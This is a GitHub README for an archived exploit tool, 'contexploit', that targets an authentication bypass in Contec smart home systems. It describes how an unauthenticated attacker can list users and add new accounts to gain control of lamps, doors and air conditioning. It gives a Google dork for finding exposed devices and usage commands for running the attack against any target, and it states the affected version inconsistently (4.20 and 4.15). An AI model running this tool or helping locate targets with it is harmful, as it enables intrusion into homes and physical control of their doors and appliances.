Skip to content
This repository has been archived by the owner on Jan 26, 2024. It is now read-only.

BlackHoleSecurity/contexploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 

Repository files navigation

User Agreement

Developers assume no liability and are not responsible for any misuse or damage caused by this program

Vulnerability description

the Vulnerability allow unauthenticated attacker to remotely bypass authentication and added new user without confirming.
after Successfully added new users, the attacker can control anything (lamps, doors, air conditioner, etc)

Contec smart home Unauthorized Users Added

  • Affected version : 4.20 and older.

  • Google dork:

inurl:":9000" intitle:"Contec Intelligent Housing"

want to know more about Contec Smart Home system ?

Installation steps

  • require 2 modules (bs4, requests)
Root@Linux: ~# pip install -r requirements.txt  

or

Root@Linux: ~# pip install bs4 requests  
  • Work in both python 2.x and 3.x
  • Tested on Windows Linux and MAC os

Usage

to view users list:

Root@Linux: ~# python ./contexploit.py -t http://<ip>:<port> --list-user  

to added new user:

Root@Linux: ~# python ./contexploit.py -t http://<ip>:<port> -u <NewUser> -p <NewPassword>   

help:

Root@Linux: ~# python contexploit.py --help
usage: python contexploit.py -t http://<ip>:<port> --list-user

Contec smart home Unauthorized Users Added. (Affected version : 4.15)

optional arguments:
-h, --help              show this help message and exit
-v, --version           Show version and exit
-t, --target            Target address (e.g. http://<ip>:<port>)
-l, --list-user         Grap all user list on the web server
-u, --new-user          New username
-p, --new-password      New password